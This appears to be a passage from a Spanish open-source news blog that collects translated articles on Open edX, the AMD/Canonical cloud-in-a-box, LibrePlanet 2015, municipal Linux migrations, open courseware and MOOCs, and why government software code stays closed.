No se trata acerca de nosotros uniéndonos para diseñar una nuevaidea, se trata de cada uno de nosotros teniendo nuestro propio campo de especialización y combinándolos para que podamos hacer aquello en lo que somos buenos, y que ellos puedan hacer en lo que son buenos. Creo en esto como: “Hacemos software de modo que tú puedas educar.” Siento que este es el núcleo de la filosofía de código abierto. En un mundo de código cerrado, hay claros proveedores y consumidores: “Tenemos el código, y tú no, así que tienes que hacer lo que hemos diseñado para ti.” En el mundo del código abierto, todo el mundo tiene la capacidad de contribuir donde quieran y puedan. Eso no tiene porque significar que todo el mundo esté trabajando en las mismas piezas, significa que la gente puede gravitar naturalmente a las partes del sistema a las que estén mejor adecuados para trabajar.

¿Puede decirnos acerca de una solicitud de incorporación (pull request) que se ha hecho para Open edX?

Una de las características que hemos tenido en Open edX desde el principio es “dando a entender”: una manera para que los instructores ofrezcan consejos a los estudiantes si están respondiendo a los problemas de forma incorrecta. Pero los investigadores de la educación de la Iniciativa de Aprendizaje Abierto, que han estado estudiando la educación en línea por más de una década, pensaron quese podía hacer mejor. Convocaron a un grupo de expertos para proponer cambios a nuestro sistema de sugerencias y los han implementado. Ese trabajo ha sido presentado como una solicitud de incorporación (pull request), y se encuentra en revisión final para su incorporación a la plataforma central. Es un gran ejemplo de los miembros de la comunidad se unen para impulsar la plataforma hacia adelante y que contribuyen a que el trabajo de nuevo en el núcleo.

Otra área fértil para la experimentación es la interacción social. Una de las claras deficiencias de aprendizaje en línea es la falta de conexiones sociales entre los estudiantes y entre los estudiantes y los instructores. Varios equipos de instrucción y los investigadores han estado experimentando con XBlocks que proporcionan tutoría, vinculación de los estudiantes, anotación, y así sucesivamente, para tratar de volver a agregar algo de la riqueza social de la enseñanza presencial. Eso esclaramente un problema de difícil solución. Tener un montón de grupos que tratan diferentes ideas y ver cuáles atraen será de gran utilidad. No tenemos que pasar por un largo proceso de planificación, y luego plantear una gran apuesta en la característica social que nos gusta. Podemos animar a los diferentes grupos a tratar diferentes ideasy ver lo que funciona.

Fuente original traducida:http://opensource.com/education/14/9/interview-ned-batchelder-openedx

Este no es el primer intento de meter la nube en una caja. Ya en mayo,en la Cumbre de OpenStack en Atlanta, Canonical anunció UbuntuOrange Box, una colección de 10 microservidores Intel NUC con uso de memoria compartida y un switch gigabit, todo ello alojado en una sola caja. El producto ha tenido cierto éxito, pero no tanto como el que a Canonical le gustaría.

Esta nueva nube en una solución de caja que es probable que obtenga mucha más atención, lo que es bueno tanto para AMD como para Ubuntu. La solución consiste en un servidor SeaMicro SM15000 y el software de Canonical consiste en:

• 3 Controladoras de nube.
• 57 nodos Nova.
• 3 nodos Cinder.
• 64 TB de almacenamiento.
• 128 GbE NIC (Max. 512).
• Conmutador de capa 2 integrado.
• 80 Gbps de E/S.
• Consume 55 vatios por servidor.
• Ubuntu LTS 14.04 y OpenStack.
• MAAS.
• Juju.

Los clientes obtienen simplicidad al implementar una nube privada. Una de las ventajas de crearla como una unidad de 10U es que encajará rápidamente en el espacio ocupado actualmente por soluciones de servidores blade existentes. Con muchas grandes organizaciones que luchan para desplegar OpenStack en la parte superior de su infraestructura de servidor blade actual, esta simplicidad atraerá.

Otra ventaja es el bajo consumo de energía de la SeaMicro SM15000 en comparación con una solución blade HP o Dell. Esto hará que sea atractivo no sólo para aquellas empresas que buscan una nube privada en las instalaciones, sino también para los proveedores de servicios que buscan soluciones simples de nube privada que pueden ofrecer a los clientes de tamaño medio.

Según Dhiraj Mallick, vicepresidente corporativo y gerente general de soluciones de centro de datos de servidor de AMD:

“AMD y Canonical han dedicado una enorme cantidad derecursos de ingeniería para asegurar una solución integrada queelimina la complejidad de la implementación de la tecnologíaOpenStack. El servidor SM15000, Ubuntu LTS 14.04 yOpenStack es una solución increíble que llena una necesidad en la industria sobre una solución OpenStack que se puede implementar fácilmente sin tener que gastar una fortuna en la contratación de servicios profesionales o equipos de personas.”

Lo más importante en este caso para los clientes es que se trata de una solución totalmente convergente que no requiere grandes cantidades de configuración o de formación. Ha habido un aumento en los dispositivos convergentes, especialmente alrededor del almacenamiento y las bases de datos, por lo que añadir la nube en una caja como una solución convergente tiene sentido.

¿Qué obtendrán AMD y Canonical de todo esto?

Tanto para AMD como para Canonical esto es más que sólo otra oferta de productos en un mercado cada vez más concurrido. AMD ha estado a la defensiva contra Intel en los últimos años y ha decidido que la mejor manera de avanzar es el hiper-escalado, los servidores de bajo consumo y ARM. Se ha introducido un procesador ARM de 64 bits diseñado para el centro de datos en la nube conocida como AMD Opteron 1100 o “Seattle”.

El procesador inicial de esta solución es el procesador AMD Opteron"Piledriver" con la opción de procesadores Intel Xeon “Haswell” y “Ivybridge”. Mirando hacia el futuro, sin embargo, es difícil ignorar el potencial de una opción AMD Opteron “Seattle” en algún momento en el futuro en función de la carga de trabajo y la demanda de los clientes.

Canonical se beneficiará más de AMD. Ubuntu sigue siendo visto como una mala opción frente a Red Hat o SUSE Linux a pesar de acuerdos tanto con Cisco como con IBM. Este último ha estado apoyando fuertemente a Ubuntu con su nueva gama de soluciones POWER 8 y Canonical ha contribuido portando más de 40.000 aplicaciones a IBM POWER.

A pesar de este compromiso por parte de Canonical, IBM ha admitido que todavía tiene que conseguir que Red Hat y SUSE anuncien que sus soluciones little-endian Linux se podrán ejecutar en la plataformade POWER 8 para mejorar su credibilidad. Por desgracia esto no ayuda a la imagen de Canonical y Ubuntu, pero los acuerdos con Cisco y ahora AMD le dará mayor presencia.

Detrás de las escenas, Canonical ha hecho otras ofertas que lo convierten en un jugador más grande de Linux lo que muchos creen. En junio se firmó un acuerdo con Mirantis para asegurar que Ubuntu y Mirantis OpenStack trabajarán perfectamente. Ese acuerdo ha dado lugar a la versión de OpenStack que se distribuye en esta solución.

Además, Canonical ha firmado un acuerdo con Docker para garantizar que su solución de contenedores se ejecuta sin problemas en Ubuntu. Esto también hará que sea más atractivo para los clientes empresariales ya que Docker se está convirtiendo rápidamente en el nuevo estándar de contenedores.

Conclusión

Este parece ser un buen negocio en general. Mientras que algunos clientes pueden no ser conscientes de Ubuntu en el espacio empresarial de Linux, que es más que capaz de mantenerse por si misma contra Red Hat y SUSE. El SM15000 de AMD no es sólo una tecnología probada, sino que es un reemplazo completo del sistema de blades con la potencia suficiente para la más compleja de las tareas. El resultado es que los clientes que han luchado con las implementaciones de nubes privadas pueden ahora acelerar ese proceso con una solución totalmente convergente. Hay otros jugadores que ya están en el mercado con sus propias soluciones convergentes. VMware ha anunciado soluciones con algunos de sus socios de hardware, y HP está tratando de implementar Helion como una nube en una caja para los clientes del sistema blade existentes. ¿Tendrán AMD y Ubuntu éxito en este mercado? Será difícil, pero hay un montón de oportunidades en el mercado para otra solución, especialmente una que esté bien desarrollada e integrada como esta.

Fuente original traducida: https://www.business-cloud.com/articles/news/amd-cloud-box

LibrePlanet es una conferencia anual para los amantes del *software *libre. La conferencia reúne a los desarrolladores de software, expertos en políticas, activistas y usuarios de ordenadores para aprender habilidades, logros de las acciones y desafíos de cara a la libertad del software. Los recién llegados son siempre bienvenidos, y LibrePlanet2015 contará con programación para todas las edades y niveles de experiencia.

Este año, el tema de LibrePlanet es “Software Libre en todas partes”. La convocatoria de las sesiones busca conversaciones que traten sobre los muchos lugares y formas en los que el software libre se está utilizando en todo el mundo, así como la manera de hacer que el software libre se expanda en todas partes. Se fomentarán las propuestas que hablen sobre “en todas partes” en el sentido amplio de la expresión. LibrePlanet 2015 llevará la libertad del software a todo el mundo, al espacio exterior, y considerará su papel en la industria, el gobierno, la academia, la organización comunitaria y la informática personal.

“LibrePlanet es una de las cosas más gratificantes que hacemos durante todo el año. Esta conferencia reúne a gente de todo el planeta que quieren hacer del mundo un lugar mejor con el software libre”

dijo John Sullivan, director ejecutivo de la FSF.

“Esperamos recibir propuestas de sesiones de personas con todos los niveles de oratoria y experiencia técnica, no tienes que ser un programador para hablar en LibrePlanet. Los usuarios de software libre, activistas, académicos, legisladores, desarrolladores y muchos otros, son todos contribuyentes clave para el movimiento del software libre, y queremos mostrar todas estas habilidades en LibrePlanet 2015″

, dijo Libby Reinish, una gestora de campañas en la FSF.

Las peticiones para realizar una intervención en el evento se pueden solicitar en https://www.libreplanet.org/2015/call_for_sessions y el plazo estará abierto hasta el domingo 2 de noviembre de 2014 a las 23:59 (UTC).

Para suscribirse a las noticias sobre LibrePlanet 2015, visita la webhttps://www.libreplanet.org/2015.

LibrePlanet 2014

LibrePlanet 2014 se llevó a cabo en el MIT los días 22-23 de marzo de 2014 con más de 350 asistentes de todo el mundo que se reunieron para las conversaciones, demostraciones y conferencias magistrales centradas en el tema de “Free Software, Free Society”. Puedes ver los vídeos de las conferencias anteriores en http://media.libreplanet.org.

La ciudad de Udine ha decidido centrarse en Linux y en la migración a software de código abierto que permitirá ahorrar a la ciudad más de 360.000 euros de dinero público.

Son muchos los municipios italianos que están (por fin) considerando seriamente pasarse a Linux y al software libre, que además de permitirles reducir su factura tecnológica, les proporciona sistemas más estables y seguros.

La migración cubrirá aproximadamente 900 ordenadores personales repartidos entre las distintas dependencias municipales y que deberá ser completado durante el año 2015 produciendo el ahorro de más estos 360.000 euros de dinero público según anunció Gabriel Giacomini del Departamento para la Innovación de la ciudad de Udine, que reconoce como el software libre se ha convertido cada vez más completa y fiable y que por tanto la migración no sólo ahorrará dinero, sino que también mantendrá operativo el mismo ordenador personal por varios años más.

La migración irá acompañada también de formación para todo el personal municipal, y estiman que a finales de año más del 40% de los empleados municipales será capaz de trabajar en Linux y software de código abierto.

A fecha de hoy no sabemos la distribución Linux que será elegida para la migración, en cambio si esta clara la elección del paquete ofimática que será usado como alternativa a Microsoft Office, en este caso Apache OpenOffice.

Felicitaciones a la ciudad de Udine por haberse decidido por Linux y el software libre.

Como nota final indicar que no son estas dos las únicas iniciativas que se están desarrollando en Italia. En los últimos meses muchas otras organizaciones gubernamentales locales han dicho adiós a Microsoft cogiendo al software libre en su lugar.Entre ellos se encuentran la provincia autónoma de Tirol del Sur, las provincias de Perugia y Terni y la región de Umbría.

En primer lugar, Linux y el código abierto en la educación se pueden clasificar en tres vertientes:

• La infraestructura de las escuela.
• El escritorio con el que trabajan los alumnos y los profesores.
• El plan de estudios para la educación de TI.

El primer punto, la infraestructura en las escuelas consiste en un montón de diferentes programas informáticos, que se utiliza para la administración. Ejemplos de las aplicaciones como los sistemas de gestión de los estudiantes, los sistemas de gestión de documentos y los sistemas operativos. Básicamente, este software no es tan diferente de lo que se utiliza en otras industrias. Esto se aplica no sólo a la formación profesional, sino a todas las escuelas de cualquier nivel.

El segundo punto, las ordenadores de escritorio que se utilizan en las escuelas están funcionando principalmente en Microsoft Windows®, y gracias a un empujón para conseguir iPads® en las escuelas, sabemos también que pueden educar con la ayuda de otros dispositivos. Así que, ¿por qué no un escritorio Linux?

Por último, en la lista de puntos, he centrado la mayor parte de mi atención, tiempo y energía en el plan de estudios para la educación de TI en educación media y profesional superior en los Países Bajos. Hasta hace cinco años, yo era como una voz en el desierto cuando defendí por Linux y el código abierto en los planes de estudio. A menudo se reían de mí cuando predecía que Linux sería el sistema operativo más utilizado para los servidores. Hoy en día, nadie niega que Linux es un serio competidor en el mundo de los servidores.

Hasta hace muy poco, yo era parte de una comisión para traer un nuevo plan de estudios para una escuela profesional superior para los administradores de sistemas. Más de la mitad de las personas presentes estaban convencidos de que Linux y el código abierto son indispensables para el centro de datos. Y, los administradores de hospedaje Linux y el código abierto son esenciales para que los graduados pudieran conseguir un trabajo en su empresa.

Para este grupo objetivo, es muy importante que el software sea escalable hacia arriba y hacia abajo, tanto técnica como económicamente. Afirman que esto es sólo lo suficientemente flexible con software de código abierto. Si ellos no son flexibles y sus competidores lo son, no pueden sobrevivir.

Un desarrollo más reciente que derribará muchas barreras en las escuelas que quieren enseñar Linux, es la disponibilidad de material de Linux gratuita a través de la Academia Cisco. Desde este ciclo escolar diez millones de estudiantes en todo el mundo tienen acceso gratuito a materiales de enseñanza de nivel de entrada de Linux a través de este método. Se trata de material didáctico basado en el conjunto mundial de objetivos de LPI Linux Essentials.

Este es el siguiente paso en la dirección correcta, pero aún no estamos allí. Por el momento, hay muchos maestros en TI, que no tienen conocimiento o experiencia con Linux y software de código abierto. Así, proveyendo a los profesores de la formación adecuada y la certificación correspondiente es cómo podemos ayudar más.

¿Está su escuela enseñando Linux y software de código abierto?

El tren ha salido de la estación y no va a parar. Depende de las escuelas y de los profesores asegurarse de que salten a bordo. ¿Lo harás tú?

Publicación original: Dutch Linux Magazine, Número 15, Julio/Agosto 2014.

[1] Abreviatura de Tecnologías de la Información.

[2] Traducido del inglés hosting.

Todos los amantes de la música en general llevamos exigiendo hace mucho tiempo, sin ningún resultado, que este tipo de obras deben ser de dominio público para permitir su difusión entre todas las personas.

Por suerte, existen iniciativas con las de MusOpen que nos permiten disfrutar de música sin estos royalties, aunque en este caso sean solo obras de música clásica. Esperamos que las disfrutes.

Fuente: https://musopen.org

Históricamente, las universidades no eran lugares inclusivos. Mientras que puedes encontrar educación gratuita universidad tradicional (el tan alabado sistema educativo de Noruega me viene a la mente, al igual que los de algunos otros países europeos), la gran mayoría del mundo simplemente no tenía acceso a la educación superior antes de la aparición de las tecnologías en línea. Esto hizo que la educación superior fuera en gran medida un ejercicio en el refuerzo de las clases (sociales) y los géneros. En décadas más recientes, las universidades han sido agresivamente monetizadas, lo que elimina en teoría la clase y el género como factores de exclusión, pero de manera más realista, simplemente actúa para reforzar la exclusividad y la falta de acceso a un mayor nivel de estudios.

La idea de abrir públicamente los estudios universitarios fue vista inicialmente en Alemania en el año 1999, pero fue popularizada por el MIT con el lanzamiento de OpenCourseWare (OCW) en el año 2002. La idea era facilitar el aprendizaje mediante el rápido crecimiento de Internet; los estudiantes pueden tener acceso a una gran cantidad de conocimiento para complementar sus estudios, prepararse mejor para la universidad y, en algunos casos, obtener una ventaja sobre temas difíciles. Esto no era nada parecido a un grado completo o incluso temarios completos, era más como el acceso a recursos y materiales de lectura.

Un avance rápido hasta 2012 y el programa OCW había explotado en toda América y en todo el mundo. Sin embargo, el aprendizaje en línea también se había generalizado, con muchas universidades que ofrecen grados en línea que proporcionan la misma calificación que los cursos tradicionales en el aula. Ahora, se espera que las universidades ofrezcan una amplia gama de materiales en línea suplementarios para acompañar el aprendizaje en el campus, y que sea posible ganar calificaciones completas sin siquiera poner un pie en el recinto universitario. OCW ha evolucionado posteriormente, con el concepto del “curso masivo abierto en línea”, o MOOC, ganando rápidamente impulso.

Coursera, el MOOC más popular en la actualidad, cuenta con más de 7,2 millones de usuarios y conecta a un gran grupo de instituciones de educación superior con los usuarios, que pueden acceder a los materiales del curso de forma gratuita. Este es un modelo de negocio con fines de lucro que aporta un valor añadido a través de diversos medios, como ofreciendo la certificación por un precio nominal y la prestación de servicios de conexión de reclutamiento profesional. edXes la versión sin animo de lucro del MIT de Coursera, que se construye utilizando el software de código abierto. Ambas organizaciones buscan redefinir la forma en que se consume la educación, con el objetivo de ser un menor coste y una distribución más amplia.

Volviendo a la pregunta inicial de lo que representa este cambio global, ahora es posible acceder a una gran cantidad de recursos de estudio de las universidades y otras instituciones de educación superior, tanto humildes y de prestigio. Algunas personas tienen una reacción instintiva de cuestionar por qué incluso pagaron por su grado, y la forma en que deben esperar las universidades sigan siendo un éxito si nadie paga. Quienes están familiarizados con el código abierto reconocerá estos argumentos; la gente utiliza la misma retórica para descartar el movimiento de la tecnología de código abierto como una pérdida de tiempo o incluso perjudicial para la rentabilidad de la empresa. Sin embargo, como se explica en el sitio web OCW, las universidades se enriquecen en gran medida por la participación en la educación de código abierto:

“A través de OCW, los educadores a mejorar los cursos y programas de estudio, por lo que sus escuelas sean más eficaces; los estudiantes a encontrar recursos adicionales para ayudar a tener éxito, y estudiantes independientes enriquecen sus vidas y utilizar el contenido para hacer frente a algunos de los retos más difíciles de nuestro mundo, incluyendo el desarrollo sostenible, el clima cambio, y la erradicación del cáncer.

Básicamente, el argumento es el mismo: MOOCs y OCW ofrecen los recursos, pero no el apoyo. Pagar por un grado significa que tiene acceso a la gama completa de apoyo a la educación que se ofrece. Pero al igual que otras áreas de código abierto, las comunidades MOOC y OCW están llenas de una amplia gama de estudiantes, profesores, profesionales, y practicantes que trabajan juntos. Los mismos principios se aplican a la educación como lo hacen en el resto del mundo abierto. Involúcrese, sea parte de una comunidad, sea apoyado, y contribuya a una mayor difusión de los conocimientos para su propio beneficio tanto como cualquier otra persona.

Traducido de la fuente original:http://opensource.com/education/14/9/global-shift-open-source-university-studies

Fuente de la imagen:https://www.flickr.com/photos/youraccount/7839525406/?rb=1

[1] La palabra en el texto original es practitioners y no he encontrado ninguna traducción que no tenga que ver con el mundo de la medicina, por lo que he decidido traducirlo literalmente.

Coincido casi por completo con las razones que esgrime en este artículo para defender el uso de software de fuentes abiertas en todas los organismos que constituyen nuestra Administración.

Echadle un vistazo y no dudéis en dejar vuestros comentarios tanto en este blog como en nuestras páginas en las redes sociales.

Fuente: http://mundoerp.com/blog/valor-software-de-fuentes-abiertas-sfa-administracion/

Según la propia web de la iniciativa se definen como:

“Plataforma Administración Local Soluciones (PALS) es una Plataforma de Aplicaciones informáticas gratuitas que el Ministerio de Industria, Energía y Turismo ha desarrollado en colaboración con las Entidades Locales atendiendo a sus necesidades y recogiendo sus iniciativas, que facilitan la gestión interna y la prestación de Servicios Públicos Digitales.” “Todas estas aplicaciones propician y facilitan a las entidades el cumplimiento de la ley 11/2007 de Acceso Electrónico de los Ciudadanos a los Servicios Públicos. Asimismo, todas ellas han pasado auditorías de calidad, usabilidad, seguridad y accesibilidad realizadas por INTECO”

De momento esta plataforma está compuesta por seis aplicaciones gratuitas y, lo más importe, son soluciones libres.

• AL SIGM: Gestión administrativa de la entidad.
• AL LocalGIS : Sistema de Información Geográfico.
• AL e-fácil: Incorpora la recepción de factura electrónica (formato facturae) y la constitución telemática de empresas (CIRCE local).
• AL Padrón: Sistema Integrado de Gestión de Padrón de habitantes.
• AL ConfiAAs : incorpora los Módulos integrables Administración Local INTAV y cAptchAlocAl que mejoran la accesibilidad y la seguridad.
• AL LOPD: Herramienta de apoyo a las Administraciones Públicas para su adaptación y cumplimiento de la Ley Orgánica de Protección de Datos (LOPD) y la Ley de Servicios de la Sociedad de la Información (LSSI).

Debido al desconocimiento que tenemos sobre ellas, seguramente propiciado porque la propia Administración no ha hecho mucha publicidad de ellas, vamos a dedicar desde este portal una serie propia para cada una de ellas donde las iremos analizando e intentando proporcionaros una critica constructiva para que os forméis, como siempre intentamos, vuestra propia opinión.

Fuente: https://www.planavanza.es/avanzalocal/Soluciones/Paginas/ALsoluciones.aspx

Esta solución IAM permite a los usuarios tener una identidad a través de todos sus sitios web y aplicaciones mediante el inicio de sesión con sus cuentas de Facebook, LinkedIn o GMail personales.

Bruce Haefele, responsable del proyecto de HealthDirect Australia, explicó que el inicio de sesión único es importante ya permite el acceso simplificado a una serie de sitios web de asesoramiento de salud como algunos relacionados con el embarazo y el cuidado de bebes para los nuevos padres.

Trabajamos con otros socios de la industria [de la salud] para que la información disponible sea apropiada para los australianos y que cumpla con las directrices de salud. No es tan aleatorio como buscar Doctor Google”,

bromeó.

HealthDirect Australia también opera un directorio de los servicios nacionales de salud de todas las organizaciones de proveedores en Australia. Es accesible en el iPhone y en dispositivos Android para que las personas puedan buscar servicios de salud en su teléfono. Por ejemplo, los consumidores pueden introducir su código postal para encontrar la ubicación de la farmacia de urgencias más cercana a su ubicación durante la noche.

Además, la organización ofrece servicios de llamadas gratuitas para los australianos, incluyendo una línea de selección de enfermería 24/7, que la gente puede utilizar para llamar y hablar con una enfermera acerca de su salud.

“Desde el principio, hemos identificado que si vamos a ser una organización segura y de confianza, necesitábamos tener un fuerte enfoque en la seguridad”,

dijo Haefele.

“Con el tiempo que ha evolucionado a medida que el gobierno federal nos ha obligado a cumplir con su Manual de Seguridad de la Información [ISM]. También tenemos que cumplir con la Ley de Privacidad y la ley de Historia Clínica Electrónica Controlada Personalmente [PCEHR]”.

HealthDirect Australia estaba comenzando a desarrollar la solución de gestión de identidades y accesos en el año 2012, no contaba con especialistas en seguridad cibernética en su personal. Se seleccionó a First Point Globalcomo proveedor de servicios de seguridad para el diseño e implementación del IAM.

“En nuestra infraestructura IAM, la mayor parte se implementa en productos de código abierto que fueron recomendados por First Point Global“,

dijo.

“Por ejemplo, utilizamos Splunk para la supervisión de seguridad y una software de gestión de logs de código abierto llamado Log Stash. En otros casos, vamos a utilizar los productos comerciales, pero si sólo si no hay una buena alternativa de código abierto”.

Además de la IAM, First Point Global implementó una solución de gestión de cortafuegos de aplicaciones web, detección y prevención de intrusiones y vulnerabilidades.

Fuente:http://www.techworld.com.au/article/553985/healthdirect_australia_sees_value_open_source_security_solution/

Los nuevos materiales en Bitesize cubren cuarenta elementos diferentes adaptados al nuevo plan de estudios, que van desde el nivel hasta la escuela primaria a los exámenes GCSE.

Los temas para los alumnos más jóvenes incluyen programas de depuración, la escritura de código de animación y explicaciones de cómo funciona Internet. La cobertura para los niños más mayores, incluye algoritmos de representación de datos y binarios.

Entre los programas de televisión con temática tecnológica que van a emitir a partir de finales de año destacan los siguientes:

• Technobabble. Un programa con tematica orientada a las aplicaciones y los gadgets hecha por el equipo de Newsround que está diseñado para alentar a su público a ampliar sus conocimientos sobre informática.
• Appsolute Genius. Un spin-off del programa Absolute Genius en el que los anfitriones entrevistarán a programadores informáticos prominentes, entre ellos los creadores de Sonic the Hedgehog y Pac-Man. El espectáculo también se llevará a cabo una competición en la que se elegirá la idea de un niño para crear un videojuego y llevarán a cabo un seguimiento del desarrollo del título durante un período de doce semanas antes de que sea publicado de forma gratuita para PC y teléfonos móviles.
• Nina and the Neurons: Go Digital. Van a dedicar cinco episodios de la serie CBeebies donde explorarán la impresión 3D, codificación y los coches sin conductor.

No es la primera iniciativa al respecto por parte de la BBC en este ámbito. La anterior iniciativa, llevada a cabo en los años ochenta del pasado siglo XX, tuvo bastante éxito dentro del Reino Unido, y se basaba en un microordenador propio de la BBC, que fue desarrollado por Acorn Computers no exenta de cierta polémica por la elección del fabricante frente a Spectrum.

Para esta nueva iniciativa, y con el objetivo de evitar los problemas de la anterior, la BBC quiere formalizar antes de Navidad acuerdos con entre diez o veinte organizaciones que se involucren en los proyectos que están planeando para el próximo año y ya han cerrado acuerdos con las empresas Microsoft, BT, Google y Samsung, y con grupos educativos como Code Club, CoderDojo, Decoded y Codecademy.

Por nuestra parte esperamos que los próximos acuerdos se cierren con más empresas y organizaciones vinculadas al software de código abierto que permitan a las nuevas generaciones aprender no solo a programar sino a realizarlo de forma libre sin crear dependencias con los sistemas cerrados de estos monstruos tecnológicos que todos ya conocemos.

Fuente: http://www.bbc.com/news/technology-28984411

Sobre Canonical dicen que

“es la compañia detras del sistema operativo Ubuntu y el proveedor principal de servicios para los despliegues de Ubuntu en los sectores empresariales, de manufactura de equipos y telecomunicaciones. Liberado en 2004, Ubuntu es una plataforma open source para clientes, servidores y computación en la nube, incluyendo dispositivos móviles y telefonos inteligentes. Los usuarios van desde compañías del Fortune 500 hasta diseñadores de hardware, proveedores de contenido, desarrolladores de software y personas individuales."

Sobre Raspberry Pi Foundation comentan que

“es una organización sin animo de lucro ubicada en el Reino Unido, cuyo producto estrella es un microordenador de bajo coste basado en Linux cuyo uso está orientado a la educación. El uso de tecnología de telefonos moviles para construir un ordenador de propósito general hace el hardware más asequible para los mercados mundiales de la educación, los sistemas empotrados y el desarrollo. La fundación es parte de una amplia coalición de organizaciones que trabaja para fomentar la enseñanza de la informática alrededor del mundo.“

Fuente: http://forumblog.org/2014/08/24-technology-companies-changing-your-future/

Disculpen las incorrecciones que haya podido cometer en la traducción y espero que sea de su agrado.

El gobierno federal es el mayor comprador de código en el mundo. ¿Por qué es este código – financiado por los contribuyentes y parte integral para el trabajo del día a día de nuestra democracia – tan a menudo oculto a la vista del público? Hay dos cuestiones a tratar para responder a esta pregunta: ¿Por qué el gobierno desarrolla tan a menudo en plataformas cerradas, y una vez desarrollado, ¿por qué no es abierto el código al público?

El uso de código abierto

Es mucho más fácil contribuir al código abierto cuando estás construyendo sobre una plataforma abierta. Si bien es posible liberar el código fuente de un script VBA, probablemente tiene más impulso y recibe una recepción más cálida desde una plataforma con una comunidad en línea más vibrante como Ruby o Python. Sin embargo, la mayoría de las veces, en el Gobierno se mira por defecto a “nivel empresarial“, desde el inicio a las plataformas propietarias, que envían al Gobierno en la trayectoria del código cerrado.

La demanda de soluciones de “empresa”

Hay una buena cantidad de FUD – miedo, incertidumbre y duda – en las compras CIO del Gobierno acerca de que el código abierto es menos seguro, con errores, o es más costoso, y que vas a tener toda una vida de sufrimiento si no se invierte en una verdadera “solución empresarial“.

Por un lado, si un organismo emite un cheque a un proveedor de software, ya saben lo que van a obtener. El contrato detalla claramente las funciones, horarios de actualización, y asigna la responsabilidad en caso de que algo vaya mal. Más importante aún, el vendedor ofrece un número de teléfono al que desde el organismo puede llamar si necesitan ayuda. “Publica en los foros de soporte y alguien responderá” puede ser una propuesta que de miedo a un CIO.

Hay menos trajes detrás de código abierto

Antes de que la transacción se produzca, la plataforma de código cerrado es probable que tenga una página de publicidad llamativa y a un grupo de vendedores federales llamando al organismo y mostrando en las conferencias las cosas que las plataformas de código abierto tradicionalmente no hacen, evitar a Red Hat y algunas otras cosas. Y cuando la oficina del CIO pide características esariales” como registros de auditoría o el cumplimiento de ciertos requisitos de cumplimiento, se puede apostar a que la solución de código cerrado se asegurará de esas características estén en el siguiente ciclo de lanzamiento.

Contratistas de código cerrado

Por último, estas plataformas de código cerrado son sobre lo que los contratistas del Gobierno saben, porque es lo que se enseña en los programas de ciencias de la computación, y lo que siempre han pedido para el suministro. Si una empresa de desarrollo experimentado tiene un montón de desarrolladores de ColdFusion, cuando licitan en un contrato, van a recomendar que el producto se ​​construya en<ColdFusion. Por no hablar que el RFPdel Gobierno puede estar enfocado para favorecer la tecnología heredada que ya conocen. Todo esto significa que antes de que la primera línea de código se haya escrito, las probabilidades están en contra de que el proyecto vaya ver nunca el exterior del cortafuegos del organismo.Pero incluso si el organismo está usando una plataforma de código cerrado, no hay razón para que su código personalizado no pueda seguir siendo de código abierto.

Contribuir con el código abierto

Con la excepción del 18F, el CFPB y algunos otros, el Gobierno no escribe código. De hecho, rara vez disponen del conocimiento humano de cómo hacerlo si quisiera. En cambio, tradicionalmente el organismo desempeña el papel de un director de programa no técnico, proporcionando especificaciones para los requisitos funcionales, y la selección de un contratista que entregue la funcionalidad final. Los puntos de contacto en el organismo que supervisa el contrato rara vez participan con la comunidad de código abierto, y mucho menos son apasionados del código abierto. Como resultado, tradicionalmente el código abierto no es ni siquiera parte de la conversación. ¿Por qué debería serlo?

Los flujos de trabajo de código cerrado<

En cuanto a la mecánica real del desarrollo de software, el contrato suele estipular un flujo de trabajo de tipo “tíralo por encima de la valla“, donde el organismo ni siquiera ver el código hasta que ya está en producción, en todo caso, muy lejos del concepto de código abierto. Incluso si se les pregunta, los contratistas puede que no tengan experiencia con flujos de trabajo de código abierto, más modernos, o con la participación en la comunidad de código abierto, creando una mala experiencia para todos los involucrados y desalentando futuros intentos sobre código abierto en todo el Gobierno.

Reinventar la rueda como un modelo de negocio

También sospecho que los contratistas federales tienen un desincentivo para abrir el código de su trabajo, teniendo en cuenta que los requisitos técnicos probablemente no varían mucho de un organismo a otro. Una solicitud FOIA es una solicitud FOIA y un comunicado de prensa es un comunicado de prensa, sin importar si tiene el membrete de FAA o de la FDA. Liberar el código de estas soluciones por primera vez podría disminuir la demanda de volver a escribir ese mismo código por segunda vez a costa del contribuyente.

Una cultura de “no”

Una vez construido, se necesitan seres humanos para llevar ese código a la velocidad de escape necesaria para superar la inercia protectora del organismo. Los responsables de seguridad probablemente que va a decir que no. Los responsables de asuntos jurídicos probablemente que va a decir que no. Tendrá que conseguir la aprobación de la plataforma de alojamiento para el código. Va a tener que adquirir un contrato de mantenimiento continuo para revisar las solicitudes de aceptación de modificaciones. Va a tener que crear una política de compromiso para el desarrollador sobre cómo los acepta. En un mundo de prioridades en competencia, es probable que los empleados del Gobierno opten por pasar al próximo proyecto de cara al ciudadano, en lugar de gastar potencialmente meses combatiendo contra el sistema inmune al cambio de la burocracia.

Choque de culturas

Incluso si el organismo se las arregla para liberar el código fuente, la comunidad de código abierto sigue un conjunto de normas muy diferentes a los de la rígida jerarquía del Gobierno. Las agencias gubernamentales no siempre saben la mejor manera de involucrar a la comunidad de código abierto, o cómo integrar un flujo de trabajo de código abierto dentro de su propia cultura “orden y control“. Apoyar a una comunidad de código abierto requiere tiempo, algo de lo que los empleados del Gobierno tradicionalmente suelen estar escasos. Y cuando el organismo no sigue las normas tácitas de la comunidad del código de fuentes abiertas, los peores temores de los negativistas se convierten en una profecía autocomplaciente.

La transparencia como una debilidad

El código de fuente abierta expone al organismo a la posibilidad de críticas por parte de millones de ojos críticos altamente técnicos, con poco sentido de la percepción desde la perspectiva del organismo. El equipo no técnico del organismo puede no tener la capacidad de evaluar la artesanía del código interno, y es a menudo preferible barrer las cosas bajo la alfombra, en lugar de potencialmente airear sus trapos sucios a algunos de los trolls más hábiles de Internet. Por no hablar de los beneficios del código abierto que los defensores exponen a menudo no se consiguen, y por lo tanto no pueden servir como un contrapeso si el código construido es tan especifico de manera tal que lo hace inutilizable fuera del Gobierno, dejando de esta manera de atraer a colaboradores externos, o si el proyecto está mal gestionado, con el fin de ahuyentar a estos contribuyentes.

Mientras tanto, el código fuente no liberado plantea un escenario de responsabilidad absolutamente cero en el clima político actual. ¿Cuál elegirías?

¿Qué debe cambiar?

Para voltear el modelo por defecto, tres son las cosas que tienen que cambiar:

